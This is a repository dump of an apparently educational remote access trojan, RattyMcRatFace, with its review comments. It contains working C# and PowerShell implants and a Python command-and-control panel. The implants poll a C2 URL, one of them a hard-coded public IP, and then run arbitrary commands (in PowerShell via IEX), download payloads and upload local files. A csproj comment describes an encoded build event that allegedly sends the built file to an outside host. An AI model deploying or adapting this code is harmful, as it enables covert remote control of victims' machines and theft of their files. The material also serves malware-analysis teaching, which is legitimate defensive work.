├── .gitattributes
├── .gitignore
├── PowerRattyMcRatFace.ps1
├── README.md
├── RattyMcC2Face
├── .idea
│ ├── RattyMcC2Face.iml
│ ├── misc.xml
│ ├── modules.xml
│ └── workspace.xml
├── README.md
├── RattyMcC2Face.py
└── RattyMcC2Face.pyproj
├── RattyMcRatFace.sln
├── RattyMcRatFace
├── App.config
├── Program.cs
├── Properties
│ ├── AssemblyInfo.cs
│ ├── Resources.Designer.cs
│ ├── Resources.resx
│ ├── Settings.Designer.cs
│ └── Settings.settings
├── README.md
└── RattyMcRatFace.csproj
├── RattyMcRatFace_Keys.pem
└── pyRattyMcRatFace.py
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is needed for earlier builds of msysgit that do not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | [Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | [Xx]64/
19 | [Xx]86/
20 | [Bb]uild/
21 | bld/
22 | [Bb]in/
23 | [Oo]bj/
24 |
25 | # Visual Studio 2015 cache/options directory
26 | .vs/
27 | # Uncomment if you have tasks that create the project's static files in wwwroot
28 | #wwwroot/
29 |
30 | # MSTest test Results
31 | [Tt]est[Rr]esult*/
32 | [Bb]uild[Ll]og.*
33 |
34 | # NUNIT
35 | *.VisualState.xml
36 | TestResult.xml
37 |
38 | # Build Results of an ATL Project
39 | [Dd]ebugPS/
40 | [Rr]eleasePS/
41 | dlldata.c
42 |
43 | # DNX
44 | project.lock.json
45 | artifacts/
46 |
47 | *_i.c
48 | *_p.c
49 | *_i.h
50 | *.ilk
51 | *.meta
52 | *.obj
53 | *.pch
54 | *.pdb
55 | *.pgc
56 | *.pgd
57 | *.rsp
58 | *.sbr
59 | *.tlb
60 | *.tli
61 | *.tlh
62 | *.tmp
63 | *.tmp_proj
64 | *.log
65 | *.vspscc
66 | *.vssscc
67 | .builds
68 | *.pidb
69 | *.svclog
70 | *.scc
71 |
72 | # Chutzpah Test files
73 | _Chutzpah*
74 |
75 | # Visual C++ cache files
76 | ipch/
77 | *.aps
78 | *.ncb
79 | *.opendb
80 | *.opensdf
81 | *.sdf
82 | *.cachefile
83 | *.VC.db
84 |
85 | # Visual Studio profiler
86 | *.psess
87 | *.vsp
88 | *.vspx
89 | *.sap
90 |
91 | # TFS 2012 Local Workspace
92 | $tf/
93 |
94 | # Guidance Automation Toolkit
95 | *.gpState
96 |
97 | # ReSharper is a .NET coding add-in
98 | _ReSharper*/
99 | *.[Rr]e[Ss]harper
100 | *.DotSettings.user
101 |
102 | # JustCode is a .NET coding add-in
103 | .JustCode
104 |
105 | # TeamCity is a build add-in
106 | _TeamCity*
107 |
108 | # DotCover is a Code Coverage Tool
109 | *.dotCover
110 |
111 | # NCrunch
112 | _NCrunch_*
113 | .*crunch*.local.xml
114 | nCrunchTemp_*
115 |
116 | # MightyMoose
117 | *.mm.*
118 | AutoTest.Net/
119 |
120 | # Web workbench (sass)
121 | .sass-cache/
122 |
123 | # Installshield output folder
124 | [Ee]xpress/
125 |
126 | # DocProject is a documentation generator add-in
127 | DocProject/buildhelp/
128 | DocProject/Help/*.HxT
129 | DocProject/Help/*.HxC
130 | DocProject/Help/*.hhc
131 | DocProject/Help/*.hhk
132 | DocProject/Help/*.hhp
133 | DocProject/Help/Html2
134 | DocProject/Help/html
135 |
136 | # Click-Once directory
137 | publish/
138 |
139 | # Publish Web Output
140 | *.[Pp]ublish.xml
141 | *.azurePubxml
142 |
143 | # TODO: Un-comment the next line if you do not want to checkin
144 | # your web deploy settings because they may include unencrypted
145 | # passwords
146 | #*.pubxml
147 | *.publishproj
148 |
149 | # NuGet Packages
150 | *.nupkg
151 | # The packages folder can be ignored because of Package Restore
152 | **/packages/*
153 | # except build/, which is used as an MSBuild target.
154 | !**/packages/build/
155 | # Uncomment if necessary however generally it will be regenerated when needed
156 | #!**/packages/repositories.config
157 | # NuGet v3's project.json files produces more ignoreable files
158 | *.nuget.props
159 | *.nuget.targets
160 |
161 | # Microsoft Azure Build Output
162 | csx/
163 | *.build.csdef
164 |
165 | # Microsoft Azure Emulator
166 | ecf/
167 | rcf/
168 |
169 | # Windows Store app package directory
170 | AppPackages/
171 | BundleArtifacts/
172 |
173 | # Visual Studio cache files
174 | # files ending in .cache can be ignored
175 | *.[Cc]ache
176 | # but keep track of directories ending in .cache
177 | !*.[Cc]ache/
178 |
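179 | # Others. NOTE(review): *.pfx key containers are ignored below, but there is no *.pem rule, and the repository tree lists RattyMcRatFace_Keys.pem, which holds an RSA private key; a key committed this way should be treated as disclosed.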
180 | ClientBin/
181 | [Ss]tyle[Cc]op.*
182 | ~$*
183 | *~
184 | *.dbmdl
185 | *.dbproj.schemaview
186 | *.pfx
187 | *.publishsettings
188 | node_modules/
189 | orleans.codegen.cs
190 |
191 | # RIA/Silverlight projects
192 | Generated_Code/
193 |
194 | # Backup & report files from converting an old project file
195 | # to a newer Visual Studio version. Backup files are not needed,
196 | # because we have git ;-)
197 | _UpgradeReport_Files/
198 | Backup*/
199 | UpgradeLog*.XML
200 | UpgradeLog*.htm
201 |
202 | # SQL Server files
203 | *.mdf
204 | *.ldf
205 |
206 | # Business Intelligence projects
207 | *.rdl.data
208 | *.bim.layout
209 | *.bim_*.settings
210 |
211 | # Microsoft Fakes
212 | FakesAssemblies/
213 |
214 | # GhostDoc plugin setting file
215 | *.GhostDoc.xml
216 |
217 | # Node.js Tools for Visual Studio
218 | .ntvs_analysis.dat
219 |
220 | # Visual Studio 6 build log
221 | *.plg
222 |
223 | # Visual Studio 6 workspace options file
224 | *.opt
225 |
226 | # Visual Studio LightSwitch build output
227 | **/*.HTMLClient/GeneratedArtifacts
228 | **/*.DesktopClient/GeneratedArtifacts
229 | **/*.DesktopClient/ModelManifest.xml
230 | **/*.Server/GeneratedArtifacts
231 | **/*.Server/ModelManifest.xml
232 | _Pvt_Extensions
233 |
234 | # LightSwitch generated files
235 | GeneratedArtifacts/
236 | ModelManifest.xml
237 |
238 | # Paket dependency manager
239 | .paket/paket.exe
240 |
241 | # FAKE - F# Make
242 | .fake/
243 |
--------------------------------------------------------------------------------
/PowerRattyMcRatFace.ps1:
--------------------------------------------------------------------------------
# PowerShell variant of the proof-of-concept RAT. It polls one hard-coded URL
# over plain HTTP, splits the reply on spaces and dispatches on the first word
# (run / download / upload / exit).
# Defender notes: the polling loop at the bottom contains no delay, so the same
# URL is requested back to back, and nothing here authenticates the server, so
# whoever answers at that address controls what this host executes.

# Returns the body of the page at the script-level $c2 URL as a string.
# NOTE(review): the name collides with the built-in Get-Command cmdlet, and the
# function declares no parameters; it reads $c2 from the enclosing scope.
function Get-Command {
    return (New-Object System.Net.WebClient).DownloadString($c2)
}

# Passes $cmd to IEX (Invoke-Expression): the text is evaluated as PowerShell
# in the current process rather than started as a separate program.
function Shell-Execute($cmd) {
    IEX "$cmd"
}

# Saves the resource at $url to the local path $fileName (both trimmed first).
function Download($url, $fileName) {
    (New-Object System.Net.WebClient).DownloadFile($url.Trim(), $fileName.Trim())
}

# Sends the local file $fileName to $url with WebClient.UploadFile.
function Upload($url, $fileName) {
    (New-Object System.Net.WebClient).UploadFile($url.Trim(), $fileName.Trim())
}

# Hard-coded command source. The scheme is plain HTTP, so commands and replies
# cross the network unencrypted and are visible to network inspection.
$c2 = "http://64.137.224.218/file.html"
while ($TRUE) {
    # The bare word c2 (not $c2) is passed here; Get-Command declares no
    # parameters, so the URL actually comes from the $c2 variable above.
    $cmdString = Get-Command c2
    $cmd,$cmdArg1,$cmdArg2 = $cmdString -split ' '
    switch($cmd)
    {
        # String.Trim with an argument strips any of those characters from both
        # ends of the string; it is not a prefix removal.
        "run" { Shell-Execute -cmd $cmdString.Trim($cmd) }
        "download" { Download -url $cmdArg1 -fileName $cmdArg2 }
        # NOTE(review): no function name precedes the parameters, so as written
        # this branch does not call Upload.
        "upload" { -url $cmdArg1 -fileName $cmdArg2 }
        "exit" { exit }
    }
}
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # RattyMcRatFace
2 |
3 | This is a Proof of Concept of a C# RAT (Remote Access Trojan) made by Sean Pierce (@secure_sean) for the How to Write Malware 101 class to demonstrate to defenders the ease, speed, development goals, and characteristics of common malware. Download the class development VM here: rebrand.ly/writemalware
4 |
5 | ## Easy for an Attacker to Change:
6 | - Hash
7 | - PDB String
8 | - Compile Time
9 | - File Details
10 |
11 | ## Less Easy for an Attacker to Change:
12 | - File Size
13 | - Domains
14 |
15 | ## Harder for an Attacker to Change:
16 | - Features
17 | - Functionality
18 | - Network Traffic
19 | - ImpHash
20 |
21 | ## When Hunting for Malware, Search for:
22 | - Small Executable files - scripts, stagers, downloaders, etc.
23 | - Freshly compiled and installed executables
24 | - Common persistence mechanisms and malicious or administrative functionality
25 |
26 |
27 |
--------------------------------------------------------------------------------
/RattyMcC2Face/.idea/RattyMcC2Face.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/RattyMcC2Face/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/RattyMcC2Face/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/RattyMcC2Face/.idea/workspace.xml:
--------------------------------------------------------------------------------
43 | true
44 | DEFINITION_ORDER
93 | 1516129103806
94 |
95 |
96 | 1516129103806
--------------------------------------------------------------------------------
/RattyMcC2Face/README.md:
--------------------------------------------------------------------------------
1 | # How to use the Command and Control (C2) Panel
2 |
3 | 0. Transfer the python script if necessary
4 | ```scp RattyMcC2Face.py root@192.168.x.x:/root```
5 |
6 | 1. Install the requirements if necessary (already installed in the class development VM here: https://rebrand.ly/writemalware )
7 | ```pip install colorama```
8 |
9 | 2. Execute the python script
10 | ```python RattyMcC2Face.py```
11 |
12 |
--------------------------------------------------------------------------------
/RattyMcC2Face/RattyMcC2Face.py:
--------------------------------------------------------------------------------
# Operator-side C2 panel for the classroom RAT (Python 2: BaseHTTPServer, raw_input).
# The operator types one command; the next GET from an implant receives it, and
# anything an implant POSTs back is printed and written to a file.
# Defender / lab notes: the listener binds to every interface on port 80 and
# performs no authentication, so any client that can reach it can read the
# pending command or have its POST body written to disk. Traffic is plain HTTP.
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from colorama import init, Fore, Back, Style
import datetime

init()
# Pending command; set by the operator loop below and cleared by do_GET.
cmd = ""
class c2(BaseHTTPRequestHandler):
    """HTTP handler that serves the pending command and stores uploaded data."""

    def _set_headers(self):
        """Send a 200 response with a text/html content type and end the headers."""
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_GET(self):
        """Reply to any GET path with the pending command, then clear it."""
        print(Fore.YELLOW + "Recieved GET request: " + self.path)
        print(Fore.YELLOW + "Sending command: " + cmd)
        print(Style.RESET_ALL)
        self._set_headers()
        # The response body is the raw command text; the request path is only logged.
        self.wfile.write(cmd)
        # Clear command
        # NOTE(review): the global declaration comes after cmd has already been
        # read in this function; Python 2 is expected to accept this with a warning.
        global cmd
        cmd = ""

    def do_HEAD(self):
        """Answer HEAD with the same headers as GET and no body."""
        self._set_headers()

    def do_POST(self):
        """Read the POST body, print it and save it under a timestamped name."""
        # The client-supplied Content-Length decides how many bytes are read;
        # no upper bound is applied here.
        content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
        post_data = self.rfile.read(content_length) # <--- Gets the data itself
        print( Fore.GREEN + "Recieved: " + str(post_data))

        # The file name is generated locally from the clock, not taken from the
        # request; the file is created in the current working directory.
        now = datetime.datetime.now()
        filename = now.strftime("%Y-%m-%d_%H_%M_%f") + "_uploadedFile.bin"
        open(filename,'wb').write(str(post_data))
        print( Fore.GREEN + "This output has been written to file: " + filename)
        print(Style.RESET_ALL)

        self._set_headers()
        # NOTE(review): this literal spans three lines on the page; it appears to
        # have lost its HTML markup during extraction.
        self.wfile.write("
POSTed!
")


# Empty host string: listen on all interfaces, port 80.
server_address = ('', 80)
httpd = HTTPServer(server_address, c2)
print('Starting httpd...')
while True:
    cmd = raw_input("Enter Command: ")
    # handle_request() serves exactly one request per call. Requests are only
    # served after the operator has entered a command.
    httpd.handle_request()
    # Keep serving until a GET has collected the command (do_GET resets cmd).
    while cmd != "":
        httpd.handle_request()
    print("> Command Sent!")
--------------------------------------------------------------------------------
/RattyMcC2Face/RattyMcC2Face.pyproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Debug
5 | 2.0
6 | c0401e50-9f78-4418-b8aa-6e46697844ae
7 | .
8 | RattyMcC2Face.py
9 |
10 |
11 | .
12 | .
13 | RattyMcC2Face
14 | RattyMcC2Face
15 |
16 |
17 | true
18 | false
19 |
20 |
21 | true
22 | false
23 |
24 |
25 |
26 |
27 |
28 | 10.0
29 |
30 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
--------------------------------------------------------------------------------
/RattyMcRatFace.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.27130.2036
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RattyMcRatFace", "RattyMcRatFace\RattyMcRatFace.csproj", "{8A18FBCF-8CAC-482D-8AB7-08A44F0E278E}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {8A18FBCF-8CAC-482D-8AB7-08A44F0E278E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {8A18FBCF-8CAC-482D-8AB7-08A44F0E278E}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {8A18FBCF-8CAC-482D-8AB7-08A44F0E278E}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {8A18FBCF-8CAC-482D-8AB7-08A44F0E278E}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {DF90CCFE-8ECB-4278-A7E8-E3D68466CA07}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/RattyMcRatFace/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/RattyMcRatFace/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Threading;

namespace RattyMcRatFace
{
    static class Program
    {
        /// <summary>
        /// This is a basic example / Proof of Concept of a C# RAT (Remote Access Trojan) made by Sean Pierce (@secure_sean)
        /// to demonstrate to defenders the ease, speed, development goals and characteristics of common malware.
        /// This is for educational use only
        ///
        /// ## Easy for an Attacker to Change:
        /// Hash
        /// PDB String
        /// Compile Time
        /// File Details
        ///
        /// ## Less Easy for an Attacker to Change:
        /// File Size
        /// Domains
        ///
        /// ## Harder for an Attacker to Change:
        /// Features
        /// Functionality
        /// Network Traffic
        /// ImpHash
        ///
        /// ## When hunting for malware Search for:
        /// Small Executable files - scripts, stagers, downloaders, etc.
        /// Freshly compiled and installed executables
        /// Common persistence, malicious/administration functionality
        /// </summary>

        [STAThread]
        static void Main()
        {
            // Run the C2 Panel:
            // pip install colorama
            // python RattyMcC2Face.py
            //
            //
            // Simple C2 Test cases without the python C2 Panel:
            // echo "run cmd /c mkdir C:\test" > cmd.html
            // echo "download https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe pp.exe" > download.html
            // echo "download ftp://ftp.chiark.greenend.org.uk/users/sgtatham/putty-latest/w32/putty.exe pp.exe" > download-ftp.html
            // python -m SimpleHTTPServer 80


            // Loopback URL: as committed, this sample polls a page served from the
            // local machine. The scheme is plain HTTP, so commands and results are
            // unencrypted on the wire.
            String c2 = "http://127.0.0.1/cmd.html";
            // Not referenced again in this file.
            Random getrandom = new Random();
            // Each pass issues one GET for the command and, unless the command is
            // "exit", one POST of the result to the same URL. No delay between
            // passes is visible here, so the requests repeat back to back.
            while (true)
            {
                String output = "Command was recieved but there is either no RAT command by that name or there is no output. If there is a RAT command (like 'run', 'upload', or 'download' then you probably need to add code to return the output";
                // On a failed fetch GetCommand returns an error string instead of
                // throwing; its first word matches no case below, so the default
                // message above is what gets posted back.
                String cmdString = GetCommand(c2);
                String cmd = cmdString.Split()[0];
                switch (cmd)
                {
                    case "run": // run mkdir C:\test
                        String programAndArgs = cmdString.Substring(4); // mkdir C:\test
                        String program = programAndArgs.Split()[0]; // mkdir
                        String args = programAndArgs.Substring(program.Length); // C:\test
                        output = ShellExecute(program, args);
                        break;
                    case "download":
                        output = Download(cmdString.Split()[1], cmdString.Split()[2]);
                        break;
                    case "upload":
                        // The file is sent to the same URL the commands come from.
                        output = Upload(c2, cmdString.Split()[1]);
                        break;
                    case "exit":
                        return;
                }
                // The value returned by UploadOutput is discarded.
                UploadOutput(c2, cmd, output);
            }
        }



        /// <summary>
        /// Downloads the page at <paramref name="c2"/> and returns its body as the command line.
        /// On a WebException the exception text is returned in place of a command.
        /// </summary>
        static String GetCommand(String c2)
        {
            try
            {
                return (new WebClient()).DownloadString(c2);
            }
            catch (System.Net.WebException e)
            {
                return "Failed to get command: " + e.ToString();
            }
        }

        /// <summary>
        /// Starts <paramref name="cmd"/> with <paramref name="args"/> as a child process and
        /// returns its standard output, or the exception text if the process cannot be run.
        /// </summary>
        static string ShellExecute(String cmd, String args)
        {
            // Old simple way
            // System.Diagnostics.Process.Start("CMD.exe", "/C " + cmd);

            // New way so that we can get output
            // Defender note: the child is created directly (UseShellExecute = false)
            // with no window, so the observable artefact is a process-creation
            // event whose parent is this executable. Only stdout is redirected.
            var proc = new Process
            {
                StartInfo = new ProcessStartInfo
                {
                    FileName = cmd,
                    Arguments = args,
                    UseShellExecute = false,
                    RedirectStandardOutput = true,
                    CreateNoWindow = true
                }
            };

            String output = "";
            try
            {
                proc.Start();

                // Reads line by line until the child closes stdout.
                while (!proc.StandardOutput.EndOfStream)
                {
                    output += proc.StandardOutput.ReadLine() + "\n";

                }
            } catch ( Exception e)
            {
                output = e.ToString();
                // Each += below appends the current text to itself before the new
                // suffix, so the exception text is repeated in the result.
                output += output + "\n\nCommand Recieved: " + cmd;
                output += output + "\nArgs Recieved:: " + args;
                output += output + "\n\nTry: 'run cmd /c " + cmd + args + "'";
            }


            return output;
        }

        /// <summary>
        /// Saves the resource at <paramref name="url"/> to the local path <paramref name="fileName"/>
        /// and returns a status string. Only WebException is caught.
        /// </summary>
        static String Download(String url, String fileName)
        {
            try
            {
                (new WebClient()).DownloadFile(url, fileName);
                return "File Attempted to Download";
            }
            catch (System.Net.WebException e)
            {
                return "Failed to Download File: " + e.ToString();
            }
        }

        /// <summary>
        /// Sends the local file <paramref name="fileName"/> to <paramref name="url"/> with
        /// WebClient.UploadFile and returns the server's reply decoded as ASCII.
        /// </summary>
        static String Upload(String url, String fileName)
        {
            try
            {
                byte[] responseArray = (new WebClient()).UploadFile(url, fileName);
                return "UploadFile Returned: " + System.Text.Encoding.ASCII.GetString(responseArray);

                // Another Method: Reading and upload the content of the file
                //string text = System.IO.File.ReadAllText(fileName);
                //return "UploadString Returned: " + (new WebClient()).UploadString(url, text);
            }
            catch (System.Net.WebException e)
            {
                return "Failed to Upload File: " + e.ToString();
            }
        }

        /// <summary>
        /// Sends the text "Output from '<paramref name="cmd"/>': " followed by
        /// <paramref name="output"/> to <paramref name="url"/> with WebClient.UploadString
        /// and returns the server's reply, or an error string on a WebException.
        /// </summary>
        static String UploadOutput(String url, String cmd, String output)
        {
            try
            {
                return (new WebClient()).UploadString(url, ("Output from '" + cmd + "': " + output));
            }
            catch (System.Net.WebException e)
            {
                return "Failed to Upload Output:" + e.ToString();
            }
        }
    }
}
--------------------------------------------------------------------------------
/RattyMcRatFace/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
// NOTE(review): these strings are compiled into the binary's metadata. They
// presumably correspond to the "File Details" that the project README lists
// as easy for an attacker to change, so they are weak indicators on their own.
[assembly: AssemblyTitle("RattyMcRatFace")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("RattyMcRatFace")]
[assembly: AssemblyCopyright("Copyright © 2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
// This is the same value as the project GUID in RattyMcRatFace.sln. It is
// stored in the compiled assembly's metadata and stays the same across
// rebuilds unless someone edits it.
[assembly: Guid("8a18fbcf-8cac-482d-8ab7-08a44f0e278e")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
--------------------------------------------------------------------------------
/RattyMcRatFace/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace RattyMcRatFace.Properties
{


    /// <summary>
    /// A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources
    {

        // Lazily created by the ResourceManager getter below.
        private static global::System.Resources.ResourceManager resourceMan;

        // Culture override returned and set through the Culture property.
        private static global::System.Globalization.CultureInfo resourceCulture;

        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources()
        {
        }

        /// <summary>
        /// Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager
        {
            get
            {
                // Created on first access for the "RattyMcRatFace.Properties.Resources" base name.
                if ((resourceMan == null))
                {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("RattyMcRatFace.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }

        /// <summary>
        /// Overrides the current thread's CurrentUICulture property for all
        /// resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture
        {
            get
            {
                return resourceCulture;
            }
            set
            {
                resourceCulture = value;
            }
        }
    }
}
--------------------------------------------------------------------------------
/RattyMcRatFace/Properties/Resources.resx:
--------------------------------------------------------------------------------
106 | text/microsoft-resx
107 |
108 |
109 | 2.0
110 |
111 |
112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
113 |
114 |
115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
--------------------------------------------------------------------------------
/RattyMcRatFace/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace RattyMcRatFace.Properties
{


    // Generated application-settings wrapper. No individual settings are
    // declared in this file; it only exposes the shared Default instance.
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")]
    internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase
    {

        // Single instance, wrapped by ApplicationSettingsBase.Synchronized.
        private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));

        // Returns the shared instance created above.
        public static Settings Default
        {
            get
            {
                return defaultInstance;
            }
        }
    }
}
--------------------------------------------------------------------------------
/RattyMcRatFace/Properties/Settings.settings:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/RattyMcRatFace/README.md:
--------------------------------------------------------------------------------
1 | # RattyMcRatFace
2 |
--------------------------------------------------------------------------------
/RattyMcRatFace/RattyMcRatFace.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {8A18FBCF-8CAC-482D-8AB7-08A44F0E278E}
8 | WinExe
9 | Properties
10 | RattyMcRatFace
11 | RattyMcRatFace
12 | v4.5.2
13 | 512
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 | ResXFileCodeGenerator
53 | Resources.Designer.cs
54 | Designer
55 |
56 |
57 | True
58 | Resources.resx
59 |
60 |
61 | SettingsSingleFileGenerator
62 | Settings.Designer.cs
63 |
64 |
65 | True
66 | Settings.settings
67 | True
68 |
69 |
70 |
71 |
72 |
73 |
74 |
<!-- NOTE(review): this line and the one after it appear to be MSBuild build-event commands (the surrounding tags were lost in extraction), so they run on the machine of whoever builds the project. This line records the build output path in %TEMP%\msbuild.txt. The next line is PowerShell passed with -enc (Base64 of UTF-16LE text); as decoded by this reviewer it appears to copy the freshly built file into C:\ProgramData\MicrosoftBuildEvents under a timestamped name and to send it with WebClient.UploadFileAsync to https://info.hookupfails.com/uploadCatcher.php, ignoring any error. Decode it independently, and remove or neutralise the build event before building anywhere other than an isolated lab. -->
75 | powershell -c Out-File -filepath $env:TEMP\msbuild.txt -InputObject '$(TargetPath)'
